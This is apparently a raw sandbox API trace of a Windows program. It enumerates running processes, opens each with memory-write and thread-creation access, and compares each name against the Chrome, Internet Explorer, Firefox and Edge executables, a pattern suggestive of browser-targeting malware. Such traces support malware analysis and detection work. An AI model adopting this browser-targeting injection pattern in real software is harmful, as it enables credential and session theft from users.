	[0209.647] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0209.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3484
	[0209.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.647] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0209.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.648] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.648] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0209.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.648] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.649] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0209.649] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3488
	[0209.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.649] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.650] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.650] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.650] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.651] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0209.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x348c
	[0209.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.651] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0209.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.652] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.652] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0209.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.652] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.653] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0209.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3490
	[0209.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.653] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0209.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.654] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.654] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0209.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.654] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.655] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0209.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3494
	[0209.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.655] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0209.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.656] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.656] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0209.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.656] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.656] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0209.657] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3498
	[0209.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.657] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0209.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.657] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.658] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0209.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.658] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.658] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x349c
	[0209.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.659] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.659] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.660] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.660] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.660] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x34a0
	[0209.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.661] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.661] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.662] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.663] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.663] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x34a4
	[0209.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.664] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.664] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.664] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.665] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.665] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x34a8
	[0209.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.666] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.666] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.666] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.667] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.667] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x34ac
	[0209.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.668] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.668] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.668] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.668] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.669] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x34b0
	[0209.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.669] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.670] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.670] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.670] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.671] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x34b4
	[0209.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.671] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.672] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.672] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.672] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.672] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0209.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x34b8
	[0209.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.673] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0209.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.674] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.674] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0209.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.674] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.675] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x34bc
	[0209.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.675] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.676] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.676] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.676] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.676] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0209.677] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x34c0
	[0209.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.677] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.678] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.678] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.678] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.678] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x34c4
	[0209.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.679] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.679] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.680] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.680] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.681] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x34c8
	[0209.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.681] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.682] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.682] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.682] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.683] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0209.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x34cc
	[0209.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.683] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0209.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.684] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.684] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0209.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.684] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.685] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0209.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x34d0
	[0209.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.685] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0209.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.686] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.686] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0209.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.686] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.686] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0209.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x34d4
	[0209.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.687] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0209.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.687] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.688] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0209.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.688] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.688] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0209.689] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x34d8
	[0209.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.689] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0209.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.689] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.689] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0209.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.690] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.690] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0209.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0209.691] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0209.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x34dc
	[0209.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.692] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0209.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.692] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.693] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0209.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.693] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.694] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0209.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x34e0
	[0209.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.694] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0209.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.695] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.695] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0209.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.695] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.695] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0209.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x34e4
	[0209.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.697] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0209.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
